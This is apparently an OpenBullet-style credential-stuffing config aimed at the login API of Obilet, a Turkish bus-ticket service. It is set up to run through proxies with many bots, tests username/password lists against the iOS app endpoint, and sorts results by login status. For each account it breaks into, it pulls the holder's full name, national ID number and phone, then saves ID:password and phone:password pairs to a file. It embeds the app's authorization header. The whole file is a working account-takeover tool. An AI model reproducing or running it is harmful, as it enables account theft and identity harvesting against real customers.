[SETTINGS]
{
  "Name": "Obilet IOS API",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2022-06-30T20:26:01.908703+03:00",
  "AdditionalInfo": "TEL PASS TCKN PASS ÇEKER",
  "RequiredPlugins": [],
  "Author": "Raymond",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 1,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Obilet IOS API",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
REQUEST POST "https://v2-api.obilet.com/api/client/getsession" 
  CONTENT "{\"consumer\":\"obilet\",\"type\":2,\"connection\":{},\"application\":{\"version\":\"11.4\",\"equipment-id\":\"F60E021C-41DE-4689-AB05-151DA8F38F41\"}}" 
  CONTENTTYPE "application/json" 
  HEADER "Host: v2-api.obilet.com" 
  HEADER "Accept: /" 
  HEADER "Content-Type: application/json" 
  HEADER "Authorization: Basic R21STG5Qd0E5QmwwS0w1UlN6L3VsZz09" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "User-Agent: obilet/11.4 (mobilatolye.Obilet; build:20220602; iOS 15.5.0) Alamofire/11.4" 
  HEADER "Content-Length: 133" 
  HEADER "Accept-Language: fr-BE;q=1.0, tr-BE;q=0.9, en-BE;q=0.8, ru-BE;q=0.7, az-BE;q=0.6, zh-Hans-BE;q=0.5" 
  HEADER "Connection: close" 

PARSE "<SOURCE>" JSON "session-id" -> VAR "session-id" 

PARSE "<SOURCE>" JSON "device-id" -> VAR "device-id" 

#LOGIN REQUEST POST "https://v2-api.obilet.com/api/membership/login" 
  CONTENT "{\"data\":{\"password\":\"<PASS>\",\"remember-me\":1,\"username\":\"<USER>\"},\"date\":\"2022-06-14T13:29:58\",\"language\":\"tr-TR\",\"consumer\":\"obilet\",\"device-session\":{\"session-id\":\"<session-id>\",\"device-id\":\"<device-id>\"}}" 
  CONTENTTYPE "application/json" 
  HEADER "Host: v2-api.obilet.com" 
  HEADER "Accept: */*" 
  HEADER "Content-Type: application/json" 
  HEADER "Authorization: Basic R21STG5Qd0E5QmwwS0w1UlN6L3VsZz09" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "User-Agent: obilet/11.4 (mobilatolye.Obilet; build:20220602; iOS 15.5.0) Alamofire/11.4" 
  HEADER "Accept-Language: fr-BE;q=1.0, tr-BE;q=0.9, en-BE;q=0.8, ru-BE;q=0.7, az-BE;q=0.6, zh-Hans-BE;q=0.5" 
  HEADER "Connection: close" 

#KEYCEK KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "status\":\"WrongPassword" 
    KEY "status\":\"InvalidRequestData\"" 
    KEY "status\":\"UserNotFound\"" 
  KEYCHAIN Success OR 
    KEY "status\":\"Success\"" 

PARSE "<SOURCE>" LR "data\":\"" "\"" -> VAR "data" 

REQUEST POST "https://v2-api.obilet.com/api/membership/getuser" 
  CONTENT "{\"device-session\":{\"session-id\":\"<session-id>\",\"device-id\":\"<device-id>\"},\"consumer\":\"obilet\",\"language\":\"tr-TR\",\"token\":\"<data>\",\"date\":\"2022-06-14T14:01:52\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Host: v2-api.obilet.com" 
  HEADER "Accept: /" 
  HEADER "Content-Type: application/json" 
  HEADER "Authorization: Basic R21STG5Qd0E5QmwwS0w1UlN6L3VsZz09" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "User-Agent: obilet/11.4 (mobilatolye.Obilet; build:20220602; iOS 15.5.0) Alamofire/11.4" 
  HEADER "Content-Length: 250" 
  HEADER "Accept-Language: fr-BE;q=1.0, tr-BE;q=0.9, en-BE;q=0.8, ru-BE;q=0.7, az-BE;q=0.6, zh-Hans-BE;q=0.5" 
  HEADER "Connection: close" 

PARSE "<SOURCE>" JSON "full-name" CreateEmpty=FALSE -> CAP "İsim & Sosim" 

PARSE "<SOURCE>" JSON "gov-id" CreateEmpty=FALSE -> CAP "TCKN" 

PARSE "<SOURCE>" JSON "phone" CreateEmpty=FALSE -> CAP "Telefon" 

UTILITY File "DB/Obilet_Tel_Pass.txt" AppendLines "<TCKN>:<PASS>" 

UTILITY File "DB/Obilet_Tel_Pass.txt" AppendLines "<Telefon>:<PASS>" 

